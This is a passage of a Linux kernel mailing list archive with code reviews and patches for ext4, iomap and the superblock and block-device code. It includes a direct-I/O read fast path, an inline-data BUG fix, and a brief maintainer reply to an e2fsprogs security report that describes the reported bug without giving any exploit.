  Cc: Christoph Hellwig, Jan Kara, Jens Axboe, Alexander Viro,
	linux-block, linux-kernel, linux-fsdevel, Carlos Maiolino,
	linux-xfs, Chris Mason, David Sterba, linux-btrfs,
	Theodore Ts'o, linux-ext4, Gao Xiang, linux-erofs
In-Reply-To: <20260602-work-super-bdev_holder_global-v1-3-bb0fd82f3861@kernel.org>

On Tue 02-06-26 12:10:09, Christian Brauner wrote:
> setup_bdev_super() already refuses to bring a filesystem up on a frozen
> block device but only for the primary device. Now that filesystems claim
> every device through fs_bdev_file_open_by_{dev,path}(), do that check
> once in the registration helper so it covers all of them.
> 
> Drop the now-redundant check from setup_bdev_super().
> 
> Signed-off-by: Christian Brauner (Amutable) <brauner@kernel.org>
> ---
>  fs/super.c | 21 +++++++++++----------
>  1 file changed, 11 insertions(+), 10 deletions(-)
> 
> diff --git a/fs/super.c b/fs/super.c
> index e0174d5819a0..cea743f699e4 100644
> --- a/fs/super.c
> +++ b/fs/super.c
> @@ -1690,6 +1690,17 @@ static int fs_bdev_register(struct file *bdev_file, struct super_block *sb)
>  	sb->s_count++;
>  	spin_unlock(&sb_lock);
>  
> +	/*
> +	 * Don't bring a filesystem up on a frozen device.  The entry is already
> +	 * published, so a freeze either is seen here or finds it and waits in
> +	 * super_lock() until this mount is born or (on -EBUSY) dies.  The mount
> +	 * aborts, so the entry is torn down without rebalancing @fs_bdev_active.
> +	 */
> +	if (atomic_read(&file_bdev(bdev_file)->bd_fsfreeze_count) > 0) {
> +		fs_bdev_holder_put(h);
> +		return -EBUSY;
> +	}
> +
>  	return 0;
>  }

Shouldn't this check be common also for the branch where we only increase
the refcount? Or is a filesystem where a superblock claims the bdev
multiple times and can get frozen inbetween too insane?

								Honza
-- 
Jan Kara <jack@suse.com>
SUSE Labs, CR

^ permalink raw reply

* Re: [PATCH RFC 1/8] fs, block: move blk_mode_t and fop_flags_t into <linux/types.h>
From: Jan Kara @ 2026-06-08  9:57 UTC (permalink / raw)
  To: Christian Brauner
  Cc: Christoph Hellwig, Jan Kara, Jens Axboe, Alexander Viro,
	linux-block, linux-kernel, linux-fsdevel, Carlos Maiolino,
	linux-xfs, Chris Mason, David Sterba, linux-btrfs,
	Theodore Ts'o, linux-ext4, Gao Xiang, linux-erofs
In-Reply-To: <20260602-work-super-bdev_holder_global-v1-1-bb0fd82f3861@kernel.org>

On Tue 02-06-26 12:10:07, Christian Brauner wrote:
> blk_mode_t and fop_flags_t are both plain 'unsigned int __bitwise' flag
> typedefs, exactly like the gfp_t, slab_flags_t and fmode_t that already
> live in <linux/types.h>. Move them there so they are available
> everywhere without having to drag in a subsystem header.
> 
> Signed-off-by: Christian Brauner (Amutable) <brauner@kernel.org>

Makes sense. Feel free to add:

Reviewed-by: Jan Kara <jack@suse.cz>

								Honza

> ---
>  include/linux/blkdev.h | 2 --
>  include/linux/fs.h     | 2 --
>  include/linux/types.h  | 2 ++
>  3 files changed, 2 insertions(+), 4 deletions(-)
> 
> diff --git a/include/linux/blkdev.h b/include/linux/blkdev.h
> index 890128cdea1c..c8494d64a69d 100644
> --- a/include/linux/blkdev.h
> +++ b/include/linux/blkdev.h
> @@ -126,8 +126,6 @@ struct blk_integrity {
>  	unsigned char				pi_tuple_size;
>  };
>  
> -typedef unsigned int __bitwise blk_mode_t;
> -
>  /* open for reading */
>  #define BLK_OPEN_READ		((__force blk_mode_t)(1 << 0))
>  /* open for writing */
> diff --git a/include/linux/fs.h b/include/linux/fs.h
> index 11559c513dfb..e9346be8470f 100644
> --- a/include/linux/fs.h
> +++ b/include/linux/fs.h
> @@ -1921,8 +1921,6 @@ struct dir_context {
>  struct io_uring_cmd;
>  struct offset_ctx;
>  
> -typedef unsigned int __bitwise fop_flags_t;
> -
>  struct file_operations {
>  	struct module *owner;
>  	fop_flags_t fop_flags;
> diff --git a/include/linux/types.h b/include/linux/types.h
> index 608050dbca6a..ef026585420b 100644
> --- a/include/linux/types.h
> +++ b/include/linux/types.h
> @@ -163,6 +163,8 @@ typedef u32 dma_addr_t;
>  typedef unsigned int __bitwise gfp_t;
>  typedef unsigned int __bitwise slab_flags_t;
>  typedef unsigned int __bitwise fmode_t;
> +typedef unsigned int __bitwise blk_mode_t;
> +typedef unsigned int __bitwise fop_flags_t;
>  
>  #ifdef CONFIG_PHYS_ADDR_T_64BIT
>  typedef u64 phys_addr_t;
> 
> -- 
> 2.47.3
> 
-- 
Jan Kara <jack@suse.com>
SUSE Labs, CR

^ permalink raw reply

* Re: security bug reporting: e2fsprogs: Path Traversal and heap overflow
From: Andreas Dilger @ 2026-06-08  9:49 UTC (permalink / raw)
  To: Feng Xue; +Cc: tytso@mit.edu, linux-ext4@vger.kernel.org
In-Reply-To: <SY0P300MB0070F750CCF6F2C3A2A91FDE901F2@SY0P300MB0070.AUSP300.PROD.OUTLOOK.COM>

[-- Attachment #1: Type: text/plain, Size: 949 bytes --]

Hello Feng Xue,
thank you for your report.  The inode blocks overflow looks legitimate, and trivial to fix.  The reproducer is a bit strange, since it is a python script that generates a synthetic ext4 image directly rather than writing an e2fsck test case like "f_64kblock" using mke2fs to create the filesystem with mostly appropriate parameters, and debugfs to overwrite the values.

Then e2fsck can be run on the filesystem to fix the superblock s_blocks_per_group value.

A patch is attached with the trivial code fix for review and includes a test case.

The debugfs issue seems less important, since this requires the administrator to run the specific debugfs command on the specific file.  

> On Jun 7, 2026, at 07:34, Feng Xue <feng.xue@outlook.com> wrote:
> 
> Hi there,
> 
> I'd like to report two potential security bugs for your review.
> detailed report and pocs attached.
> 
> Best,
> Feng

Cheers, Andreas

[-- Attachment #2: 0001-libext2fs-fix-inode_blocks-overflow-in-ext2fs_open.patch --]
[-- Type: application/octet-stream, Size: 6294 bytes --]

^ permalink raw reply

* [PATCH v4] iomap: add simple read path for small direct I/O
From: Fengnan Chang @ 2026-06-08  7:31 UTC (permalink / raw)
  To: brauner, djwong, hch, ojaswin, dgc, linux-xfs, linux-fsdevel,
	linux-ext4, linux-kernel, lidiangang
  Cc: Fengnan Chang

When running 4K random read workloads on high-performance Gen5 NVMe
SSDs, the software overhead in the iomap direct I/O path
(__iomap_dio_rw) becomes a significant bottleneck.

Using io_uring with poll mode for a 4K randread test on a raw block
device:
taskset -c 30 ./t/io_uring -p1 -d512 -b4096 -s32 -c32 -F1 -B1 -R1 -X1
-n1 -P1 /dev/nvme10n1
Result: ~3.2M IOPS

Running the exact same workload on ext4 and XFS:
taskset -c 30 ./t/io_uring -p1 -d512 -b4096 -s32 -c32 -F1 -B1 -R1 -X1
-n1 -P1 /mnt/testfile
Result: ~1.92M IOPS

Profiling the ext4 workload reveals that a significant portion of CPU
time is spent on memory allocation and the iomap state machine
iteration:
  5.33%  [kernel]  [k] __iomap_dio_rw
  3.26%  [kernel]  [k] iomap_iter
  2.37%  [kernel]  [k] iomap_dio_bio_iter
  2.35%  [kernel]  [k] kfree
  1.33%  [kernel]  [k] iomap_dio_complete

Introduce simple reads to reduce the overhead of iomap, simple read path
is triggered when the request satisfies:
- I/O size is <= inode blocksize (fits in a single block, no splits).
- No custom `iomap_dio_ops` (dops) registered by the filesystem.

After this optimization, the heavy generic functions disappear from the
profile, replaced by a single streamlined execution path:
  4.83%  [kernel]  [k] iomap_dio_simple_read

With this patch, 4K random read IOPS on ext4 increases from 1.92M to
2.19M in the original single-core io_uring poll-mode workload.

Below are the test results using fio:

fs    workload       qd    simple=0      simple=1      gain
ext4  libaio         1     18,768        18,796        +0.15%
ext4  libaio         64    462,459       479,435       +3.67%
ext4  libaio         128   462,427       478,411       +3.46%
ext4  libaio         256   461,579       477,561       +3.46%
ext4  io_uring       1     18,898        18,914        +0.08%
ext4  io_uring       64    564,405       590,145       +4.56%
ext4  io_uring       128   563,322       592,365       +5.16%
ext4  io_uring       256   562,281       590,593       +5.04%
ext4  io_uring_poll  1     19,292        19,271        -0.11%
ext4  io_uring_poll  64    994,612       1,006,334     +1.18%
ext4  io_uring_poll  128   1,421,945     1,518,535     +6.79%
ext4  io_uring_poll  256   1,576,507     1,772,901     +12.46%
xfs   libaio         1     18,778        18,781        +0.01%
xfs   libaio         64    459,617       476,411       +3.65%
xfs   libaio         128   461,642       477,571       +3.45%
xfs   libaio         256   459,828       475,224       +3.35%
xfs   io_uring       1     18,898        18,923        +0.13%
xfs   io_uring       64    557,195       583,320       +4.69%
xfs   io_uring       128   560,109       585,549       +4.54%
xfs   io_uring       256   559,117       581,846       +4.07%
xfs   io_uring_poll  1     19,257        19,301        +0.23%
xfs   io_uring_poll  64    983,827       998,497       +1.49%
xfs   io_uring_poll  128   1,389,644     1,489,604     +7.19%
xfs   io_uring_poll  256   1,523,554     1,702,827     +11.77%

v4:
fix fserror report and update test data based on v7.1-rc3.

v3:
Test data updated based on v7.1-rc3.

Signed-off-by: Fengnan Chang <changfengnan@bytedance.com>
---
 fs/iomap/direct-io.c | 390 +++++++++++++++++++++++++++++++++++++++++--
 1 file changed, 376 insertions(+), 14 deletions(-)

diff --git a/fs/iomap/direct-io.c b/fs/iomap/direct-io.c
index b36ee619cdcdd..3cb179752612e 100644
--- a/fs/iomap/direct-io.c
+++ b/fs/iomap/direct-io.c
@@ -10,6 +10,9 @@
 #include <linux/iomap.h>
 #include <linux/task_io_accounting_ops.h>
 #include <linux/fserror.h>
+#include <linux/kobject.h>
+#include <linux/sysfs.h>
+#include <linux/init.h>
 #include "internal.h"
 #include "trace.h"
 
@@ -88,9 +91,9 @@ static inline enum fserror_type iomap_dio_err_type(const struct iomap_dio *dio)
 	return FSERR_DIRECTIO_READ;
 }
 
-static inline bool should_report_dio_fserror(const struct iomap_dio *dio)
+static inline bool should_report_dio_fserror(int error)
 {
-	switch (dio->error) {
+	switch (error) {
 	case 0:
 	case -EAGAIN:
 	case -ENOTBLK:
@@ -110,7 +113,7 @@ ssize_t iomap_dio_complete(struct iomap_dio *dio)
 
 	if (dops && dops->end_io)
 		ret = dops->end_io(iocb, dio->size, ret, dio->flags);
-	if (should_report_dio_fserror(dio))
+	if (should_report_dio_fserror(dio->error))
 		fserror_report_io(file_inode(iocb->ki_filp),
 				  iomap_dio_err_type(dio), offset, dio->size,
 				  dio->error, GFP_NOFS);
@@ -237,23 +240,29 @@ static void iomap_dio_done(struct iomap_dio *dio)
 	iomap_dio_complete_work(&dio->aio.work);
 }
 
-static void __iomap_dio_bio_end_io(struct bio *bio, bool inline_completion)
+static inline void iomap_dio_bio_release_pages(struct bio *bio,
+		unsigned int dio_flags, bool error)
 {
-	struct iomap_dio *dio = bio->bi_private;
-
 	if (bio_integrity(bio))
 		fs_bio_integrity_free(bio);
 
-	if (dio->flags & IOMAP_DIO_BOUNCE) {
-		bio_iov_iter_unbounce(bio, !!dio->error,
-				dio->flags & IOMAP_DIO_USER_BACKED);
+	if (dio_flags & IOMAP_DIO_BOUNCE) {
+		bio_iov_iter_unbounce(bio, error,
+				dio_flags & IOMAP_DIO_USER_BACKED);
 		bio_put(bio);
-	} else if (dio->flags & IOMAP_DIO_USER_BACKED) {
+	} else if (dio_flags & IOMAP_DIO_USER_BACKED) {
 		bio_check_pages_dirty(bio);
 	} else {
 		bio_release_pages(bio, false);
 		bio_put(bio);
 	}
+}
+
+static void __iomap_dio_bio_end_io(struct bio *bio, bool inline_completion)
+{
+	struct iomap_dio *dio = bio->bi_private;
+
+	iomap_dio_bio_release_pages(bio, dio->flags, !!dio->error);
 
 	/* Do not touch bio below, we just gave up our reference. */
 
@@ -398,6 +407,14 @@ static ssize_t iomap_dio_bio_iter_one(struct iomap_iter *iter,
 	return ret;
 }
 
+static inline unsigned int iomap_dio_alignment(struct inode *inode,
+		struct block_device *bdev, unsigned int dio_flags)
+{
+	if (dio_flags & IOMAP_DIO_FSBLOCK_ALIGNED)
+		return i_blocksize(inode);
+	return bdev_logical_block_size(bdev);
+}
+
 static int iomap_dio_bio_iter(struct iomap_iter *iter, struct iomap_dio *dio)
 {
 	const struct iomap *iomap = &iter->iomap;
@@ -416,10 +433,7 @@ static int iomap_dio_bio_iter(struct iomap_iter *iter, struct iomap_dio *dio)
 	 * File systems that write out of place and always allocate new blocks
 	 * need each bio to be block aligned as that's the unit of allocation.
 	 */
-	if (dio->flags & IOMAP_DIO_FSBLOCK_ALIGNED)
-		alignment = fs_block_size;
-	else
-		alignment = bdev_logical_block_size(iomap->bdev);
+	alignment = iomap_dio_alignment(inode, iomap->bdev, dio->flags);
 
 	if ((pos | length) & (alignment - 1))
 		return -EINVAL;
@@ -891,12 +905,352 @@ __iomap_dio_rw(struct kiocb *iocb, struct iov_iter *iter,
 }
 EXPORT_SYMBOL_GPL(__iomap_dio_rw);
 
+struct iomap_dio_simple_read {
+	struct kiocb		*iocb;
+	size_t			size;
+	unsigned int		dio_flags;
+	atomic_t		state;
+	union {
+		struct task_struct	*waiter;
+		struct work_struct	work;
+	};
+	/*
+	 * Align @bio to a cacheline boundary so that, combined with the
+	 * front_pad passed to bioset_init(), the bio sits at the start of
+	 * a cacheline in memory returned by the (HWCACHE-aligned) bio
+	 * slab.  This keeps the hot fields block layer touches on submit
+	 * and completion (bi_iter, bi_status, ...) within a single line.
+	 */
+	struct bio	bio ____cacheline_aligned_in_smp;
+};
+
+static struct bio_set iomap_dio_simple_read_pool;
+
+/*
+ * In the async simple read path, we need to prevent bio_endio() from
+ * triggering iocb->ki_complete() before the submitter has returned
+ * -EIOCBQUEUED. Otherwise, the caller might free the iocb concurrently.
+ *
+ * We use a three-state rendezvous to synchronize the submitter and end_io:
+ *
+ * IOMAP_DIO_SIMPLE_SUBMITTING: Initial state set before submitting the bio.
+ *
+ * IOMAP_DIO_SIMPLE_QUEUED: The submitter has safely queued the IO and will
+ * return -EIOCBQUEUED. If end_io sees this state, it takes over and calls
+ * ki_complete().
+ *
+ * IOMAP_DIO_SIMPLE_DONE: end_io fired before the submitter finished the
+ * submit path. end_io sets this state and does nothing else. The submitter
+ * will see this state and handle the completion synchronously (bypassing
+ * ki_complete() and returning the actual result).
+ */
+enum {
+	IOMAP_DIO_SIMPLE_SUBMITTING = 0,
+	IOMAP_DIO_SIMPLE_QUEUED,
+	IOMAP_DIO_SIMPLE_DONE,
+};
+
+static ssize_t iomap_dio_simple_read_finish(struct kiocb *iocb,
+		struct bio *bio, ssize_t ret)
+{
+	struct inode *inode = file_inode(iocb->ki_filp);
+	struct iomap_dio_simple_read *sr = bio->bi_private;
+
+	if (likely(!ret)) {
+		ret = sr->size;
+		iocb->ki_pos += ret;
+	} else if (should_report_dio_fserror(ret)) {
+		fserror_report_io(inode, FSERR_DIRECTIO_READ, iocb->ki_pos,
+				  sr->size, ret, GFP_NOFS);
+	}
+
+	iomap_dio_bio_release_pages(bio, sr->dio_flags, ret < 0);
+
+	return ret;
+}
+
+static ssize_t iomap_dio_simple_read_complete(struct kiocb *iocb,
+		struct bio *bio)
+{
+	struct inode *inode = file_inode(iocb->ki_filp);
+	ssize_t ret;
+
+	WRITE_ONCE(iocb->private, NULL);
+
+	ret = iomap_dio_simple_read_finish(iocb, bio,
+			blk_status_to_errno(bio->bi_status));
+
+	inode_dio_end(inode);
+	trace_iomap_dio_complete(iocb, ret < 0 ? ret : 0, ret > 0 ? ret : 0);
+	return ret;
+}
+
+static void iomap_dio_simple_read_complete_work(struct work_struct *work)
+{
+	struct iomap_dio_simple_read *sr =
+		container_of(work, struct iomap_dio_simple_read, work);
+	struct kiocb *iocb = sr->iocb;
+	ssize_t ret;
+
+	ret = iomap_dio_simple_read_complete(iocb, &sr->bio);
+	iocb->ki_complete(iocb, ret);
+}
+
+static void iomap_dio_simple_read_async_done(struct iomap_dio_simple_read *sr)
+{
+	struct kiocb *iocb = sr->iocb;
+
+	if (unlikely(sr->bio.bi_status)) {
+		struct inode *inode = file_inode(iocb->ki_filp);
+
+		INIT_WORK(&sr->work, iomap_dio_simple_read_complete_work);
+		queue_work(inode->i_sb->s_dio_done_wq, &sr->work);
+		return;
+	}
+
+	iomap_dio_simple_read_complete_work(&sr->work);
+}
+
+static void iomap_dio_simple_read_end_io(struct bio *bio)
+{
+	struct iomap_dio_simple_read *sr = bio->bi_private;
+
+	if (sr->waiter) {
+		struct task_struct *waiter = sr->waiter;
+
+		WRITE_ONCE(sr->waiter, NULL);
+		blk_wake_io_task(waiter);
+		return;
+	}
+
+	if (likely(atomic_read(&sr->state) == IOMAP_DIO_SIMPLE_QUEUED) ||
+	    atomic_cmpxchg(&sr->state, IOMAP_DIO_SIMPLE_SUBMITTING,
+			   IOMAP_DIO_SIMPLE_DONE) == IOMAP_DIO_SIMPLE_QUEUED)
+		iomap_dio_simple_read_async_done(sr);
+}
+
+static inline bool iomap_dio_simple_read_supported(struct kiocb *iocb,
+		struct iov_iter *iter, unsigned int dio_flags)
+{
+	struct inode *inode = file_inode(iocb->ki_filp);
+	size_t count = iov_iter_count(iter);
+
+	if (iov_iter_rw(iter) != READ)
+		return false;
+	if (!count)
+		return false;
+	/*
+	 * Simple read is an optimization for small IO. Filter out large IO
+	 * early as it's the most common case to fail for typical direct IO
+	 * workloads.
+	 */
+	if (count > inode->i_sb->s_blocksize)
+		return false;
+	if (dio_flags & (IOMAP_DIO_FORCE_WAIT | IOMAP_DIO_PARTIAL))
+		return false;
+	if (iocb->ki_pos + count > i_size_read(inode))
+		return false;
+
+	return true;
+}
+
+static ssize_t iomap_dio_simple_read(struct kiocb *iocb,
+		struct iov_iter *iter, const struct iomap_ops *ops,
+		void *private, unsigned int dio_flags)
+{
+	struct inode *inode = file_inode(iocb->ki_filp);
+	size_t count = iov_iter_count(iter);
+	int nr_pages;
+	struct iomap_dio_simple_read *sr;
+	unsigned int alignment;
+	struct iomap_iter iomi = {
+		.inode		= inode,
+		.pos		= iocb->ki_pos,
+		.len		= count,
+		.flags		= IOMAP_DIRECT,
+		.private	= private,
+	};
+	struct bio *bio;
+	bool wait_for_completion = is_sync_kiocb(iocb);
+	ssize_t ret;
+
+	if (dio_flags & IOMAP_DIO_BOUNCE)
+		nr_pages = bio_iov_bounce_nr_vecs(iter, REQ_OP_READ);
+	else
+		nr_pages = bio_iov_vecs_to_alloc(iter, BIO_MAX_VECS);
+
+	if (iocb->ki_flags & IOCB_NOWAIT)
+		iomi.flags |= IOMAP_NOWAIT;
+
+	ret = kiocb_write_and_wait(iocb, count);
+	if (ret)
+		return ret;
+
+	inode_dio_begin(inode);
+
+	ret = ops->iomap_begin(inode, iomi.pos, count, iomi.flags,
+			       &iomi.iomap, &iomi.srcmap);
+	if (ret) {
+		inode_dio_end(inode);
+		return ret;
+	}
+
+	if (iomi.iomap.type != IOMAP_MAPPED ||
+	    iomi.iomap.offset > iomi.pos ||
+	    iomi.iomap.offset + iomi.iomap.length < iomi.pos + count ||
+	    (iomi.iomap.flags & IOMAP_F_INTEGRITY)) {
+		ret = -ENOTBLK;
+		goto out_iomap_end;
+	}
+
+	alignment = iomap_dio_alignment(inode, iomi.iomap.bdev, dio_flags);
+	if ((iomi.pos | count) & (alignment - 1)) {
+		ret = -EINVAL;
+		goto out_iomap_end;
+	}
+
+	if (!wait_for_completion && unlikely(!inode->i_sb->s_dio_done_wq)) {
+		ret = sb_init_dio_done_wq(inode->i_sb);
+		if (ret < 0)
+			goto out_iomap_end;
+	}
+
+	trace_iomap_dio_rw_begin(iocb, iter, dio_flags, 0);
+
+	if (user_backed_iter(iter))
+		dio_flags |= IOMAP_DIO_USER_BACKED;
+
+	bio = bio_alloc_bioset(iomi.iomap.bdev, nr_pages,
+			       REQ_OP_READ | REQ_SYNC | REQ_IDLE,
+			       GFP_KERNEL, &iomap_dio_simple_read_pool);
+	sr = container_of(bio, struct iomap_dio_simple_read, bio);
+
+	fscrypt_set_bio_crypt_ctx(bio, inode, iomi.pos, GFP_KERNEL);
+	sr->iocb = iocb;
+	sr->dio_flags = dio_flags;
+
+	bio->bi_iter.bi_sector = iomap_sector(&iomi.iomap, iomi.pos);
+	bio->bi_ioprio = iocb->ki_ioprio;
+	bio->bi_private = sr;
+	bio->bi_end_io = iomap_dio_simple_read_end_io;
+
+	if (dio_flags & IOMAP_DIO_BOUNCE)
+		ret = bio_iov_iter_bounce(bio, iter, count);
+	else
+		ret = bio_iov_iter_get_pages(bio, iter, alignment - 1);
+	if (unlikely(ret))
+		goto out_bio_put;
+
+	if (bio->bi_iter.bi_size != count) {
+		iov_iter_revert(iter, bio->bi_iter.bi_size);
+		ret = -ENOTBLK;
+		goto out_bio_release_pages;
+	}
+
+	sr->size = bio->bi_iter.bi_size;
+
+	if ((dio_flags & IOMAP_DIO_USER_BACKED) &&
+	    !(dio_flags & IOMAP_DIO_BOUNCE))
+		bio_set_pages_dirty(bio);
+
+	if (iocb->ki_flags & IOCB_NOWAIT)
+		bio->bi_opf |= REQ_NOWAIT;
+	if ((iocb->ki_flags & IOCB_HIPRI) && !wait_for_completion) {
+		bio->bi_opf |= REQ_POLLED;
+		bio_set_polled(bio, iocb);
+		WRITE_ONCE(iocb->private, bio);
+	}
+
+	if (wait_for_completion) {
+		sr->waiter = current;
+		blk_crypto_submit_bio(bio);
+	} else {
+		atomic_set(&sr->state, IOMAP_DIO_SIMPLE_SUBMITTING);
+		sr->waiter = NULL;
+		blk_crypto_submit_bio(bio);
+		ret = -EIOCBQUEUED;
+	}
+
+	if (ops->iomap_end)
+		ops->iomap_end(inode, iomi.pos, count, count, iomi.flags,
+			       &iomi.iomap);
+
+	if (wait_for_completion) {
+		for (;;) {
+			set_current_state(TASK_UNINTERRUPTIBLE);
+			if (!READ_ONCE(sr->waiter))
+				break;
+			blk_io_schedule();
+		}
+		__set_current_state(TASK_RUNNING);
+
+		ret = iomap_dio_simple_read_finish(iocb, bio,
+				blk_status_to_errno(bio->bi_status));
+		inode_dio_end(inode);
+		trace_iomap_dio_complete(iocb, ret < 0 ? ret : 0,
+					 ret > 0 ? ret : 0);
+	} else if (atomic_cmpxchg(&sr->state, IOMAP_DIO_SIMPLE_SUBMITTING,
+				  IOMAP_DIO_SIMPLE_QUEUED) ==
+		   IOMAP_DIO_SIMPLE_DONE) {
+		ret = iomap_dio_simple_read_complete(iocb, bio);
+	} else {
+		trace_iomap_dio_rw_queued(inode, iomi.pos, count);
+	}
+
+	return ret;
+
+out_bio_release_pages:
+	if (dio_flags & IOMAP_DIO_BOUNCE)
+		bio_iov_iter_unbounce(bio, true, false);
+	else
+		bio_release_pages(bio, false);
+out_bio_put:
+	bio_put(bio);
+out_iomap_end:
+	if (ops->iomap_end)
+		ops->iomap_end(inode, iomi.pos, count, 0, iomi.flags,
+			       &iomi.iomap);
+	inode_dio_end(inode);
+	return ret;
+}
+
 ssize_t
 iomap_dio_rw(struct kiocb *iocb, struct iov_iter *iter,
 		const struct iomap_ops *ops, const struct iomap_dio_ops *dops,
 		unsigned int dio_flags, void *private, size_t done_before)
 {
 	struct iomap_dio *dio;
+	ssize_t ret;
+
+	/*
+	 * Fast path for small, block-aligned reads that map to a single
+	 * contiguous on-disk extent.
+	 *
+	 * @dops must be NULL: a non-NULL @dops means the caller wants its
+	 * ->end_io / ->submit_io hooks invoked, and in particular wants its
+	 * bios to be allocated from the filesystem-private @dops->bio_set
+	 * (whose front_pad sizes a filesystem-private wrapper around the
+	 * bio).  The fast path instead allocates from the shared
+	 * iomap_dio_simple_read_pool, whose front_pad matches
+	 * struct iomap_dio_simple_read; the two wrappers are not
+	 * interchangeable, so we must fall back to __iomap_dio_rw() in
+	 * that case.
+	 *
+	 * @done_before must be zero: a non-zero caller-accumulated residual
+	 * cannot be carried through a single-bio inline completion.
+	 *
+	 * -ENOTBLK is the private sentinel returned by iomap_dio_simple_read()
+	 * when it decides the request does not fit the fast path.
+	 * In that case we proceed to the generic __iomap_dio_rw() slow
+	 * path.  Any other errno is a real result and is propagated as-is,
+	 * in particular -EAGAIN for IOCB_NOWAIT must reach the caller.
+	 */
+	if (!dops && !done_before &&
+	    iomap_dio_simple_read_supported(iocb, iter, dio_flags)) {
+		ret = iomap_dio_simple_read(iocb, iter, ops, private, dio_flags);
+		if (ret != -ENOTBLK)
+			return ret;
+	}
 
 	dio = __iomap_dio_rw(iocb, iter, ops, dops, dio_flags, private,
 			     done_before);
@@ -905,3 +1259,11 @@ iomap_dio_rw(struct kiocb *iocb, struct iov_iter *iter,
 	return iomap_dio_complete(dio);
 }
 EXPORT_SYMBOL_GPL(iomap_dio_rw);
+
+static int __init iomap_dio_init(void)
+{
+	return bioset_init(&iomap_dio_simple_read_pool, 4,
+			   offsetof(struct iomap_dio_simple_read, bio),
+			   BIOSET_NEED_BVECS | BIOSET_PERCPU_CACHE);
+}
+fs_initcall(iomap_dio_init);
-- 
2.39.5 (Apple Git-154)

^ permalink raw reply related

* [PATCH] ext4: fix kernel BUG in ext4_write_inline_data_end
From: Aditya Prakash Srivastava @ 2026-06-08  6:52 UTC (permalink / raw)
  To: Theodore Ts'o, Andreas Dilger
  Cc: Jan Kara, Baokun Li, Ojaswin Mujoo, Ritesh Harjani, Zhang Yi,
	linux-ext4, linux-kernel, Aditya Prakash Srivastava,
	syzbot+0c89d865531d053abb2d

When the data=journal mount option is used, the ext4_journalled_write_end()
function incorrectly calls ext4_write_inline_data_end() without checking
if the EXT4_STATE_MAY_INLINE_DATA flag is still set on the inode.

If a previous attempt to convert the inline data to an extent failed (e.g.
due to ENOSPC), the EXT4_STATE_MAY_INLINE_DATA flag is cleared, but
the EXT4_INODE_INLINE_DATA flag remains set. In this scenario, the next
call to ext4_write_begin() will not prepare the inline data xattr for
writing, but ext4_journalled_write_end() will incorrectly attempt to write
to it, triggering a BUG_ON(pos + len > EXT4_I(inode)->i_inline_size) in
ext4_write_inline_data() since i_inline_size was not expanded.

Fix this by ensuring that ext4_journalled_write_end() only calls
ext4_write_inline_data_end() if the EXT4_STATE_MAY_INLINE_DATA flag is
set, mirroring the behavior of ext4_write_end() and ext4_da_write_end().

Reported-by: syzbot+0c89d865531d053abb2d@syzkaller.appspotmail.com
Closes: https://syzkaller.appspot.com/bug?extid=0c89d865531d053abb2d
Fixes: 3fdcfb668fd7 ("ext4: add journalled write support for inline data")
Signed-off-by: Aditya Prakash Srivastava <aditya.ansh182@gmail.com>
---
 fs/ext4/inode.c | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/fs/ext4/inode.c b/fs/ext4/inode.c
index c2c2d6ac7f3d..4fce9ec176f8 100644
--- a/fs/ext4/inode.c
+++ b/fs/ext4/inode.c
@@ -1560,7 +1560,8 @@ static int ext4_journalled_write_end(const struct kiocb *iocb,

 	BUG_ON(!ext4_handle_valid(handle));

-	if (ext4_has_inline_data(inode))
+	if (ext4_has_inline_data(inode) &&
+	    ext4_test_inode_state(inode, EXT4_STATE_MAY_INLINE_DATA))
 		return ext4_write_inline_data_end(inode, pos, len, copied,
 						  folio);

-- 
2.47.3

^ permalink raw reply related

* [PATCH] ext4: reject mount if clusters/inodes per group are not 8-aligned
From: Baokun Li @ 2026-06-08  6:11 UTC (permalink / raw)
  To: linux-ext4
  Cc: tytso, adilger.kernel, jack, yi.zhang, ojaswin, ritesh.list,
	Sashiko

The block and inode bitmap checksums are computed over a whole number of
bytes: ext4_inode_bitmap_csum_*() use EXT4_INODES_PER_GROUP(sb) >> 3 and
ext4_block_bitmap_csum_*() use EXT4_CLUSTERS_PER_GROUP(sb) / 8 as the
length passed to ext4_chksum().

If s_inodes_per_group or s_clusters_per_group is not a multiple of 8, the
trailing fractional bits are excluded from the checksum.  Those bits are
then unprotected, and any incremental csum update path that assumes a
byte-aligned bitmap can compute a checksum inconsistent with the full
recalculation, corrupting the on-disk bitmap checksum.

Reject such filesystems at mount time by adding the missing " & 7"
alignment checks alongside the existing range validation.

Suggested-by: Theodore Ts'o <tytso@mit.edu>
Link: https://patch.msgid.link/h3n7jlfhyna64dn5o76qxcspnhxdddcs6crpxftmy7gnl7b3sx@jenszfpcsnit
Reported-by: Sashiko <sashiko-bot@kernel.org>
Closes: https://sashiko.dev/#/patchset/20260508121539.4174601-1-libaokun%40linux.alibaba.com?part=10
Signed-off-by: Baokun Li <libaokun@linux.alibaba.com>
---
 fs/ext4/super.c | 8 +++++---
 1 file changed, 5 insertions(+), 3 deletions(-)

diff --git a/fs/ext4/super.c b/fs/ext4/super.c
index 6a77db4d3124..3daf4cdcf07e 100644
--- a/fs/ext4/super.c
+++ b/fs/ext4/super.c
@@ -4472,8 +4472,9 @@ static int ext4_handle_clustersize(struct super_block *sb)
 		sbi->s_cluster_bits = 0;
 	}
 	sbi->s_clusters_per_group = le32_to_cpu(es->s_clusters_per_group);
-	if (sbi->s_clusters_per_group > sb->s_blocksize * 8) {
-		ext4_msg(sb, KERN_ERR, "#clusters per group too big: %lu",
+	if (sbi->s_clusters_per_group > sb->s_blocksize * 8 ||
+	    sbi->s_clusters_per_group & 7) {
+		ext4_msg(sb, KERN_ERR, "invalid #clusters per group: %lu",
 			 sbi->s_clusters_per_group);
 		return -EINVAL;
 	}
@@ -5304,7 +5305,8 @@ static int ext4_block_group_meta_init(struct super_block *sb, int silent)
 		return -EINVAL;
 	}
 	if (sbi->s_inodes_per_group < sbi->s_inodes_per_block ||
-	    sbi->s_inodes_per_group > sb->s_blocksize * 8) {
+	    sbi->s_inodes_per_group > sb->s_blocksize * 8 ||
+	    sbi->s_inodes_per_group & 7) {
 		ext4_msg(sb, KERN_ERR, "invalid inodes per group: %lu\n",
 			 sbi->s_inodes_per_group);
 		return -EINVAL;
-- 
2.43.7


^ permalink raw reply related

* Re: [RFC PATCH] ext4: fix false-negative overwrite check for DIO spanning extent boundaries
From: Baokun Li @ 2026-06-08  2:25 UTC (permalink / raw)
  To: Peng Wang
  Cc: tytso, adilger.kernel, jack, ojaswin, ritesh.list, yi.zhang,
	linux-ext4, inux-kernel
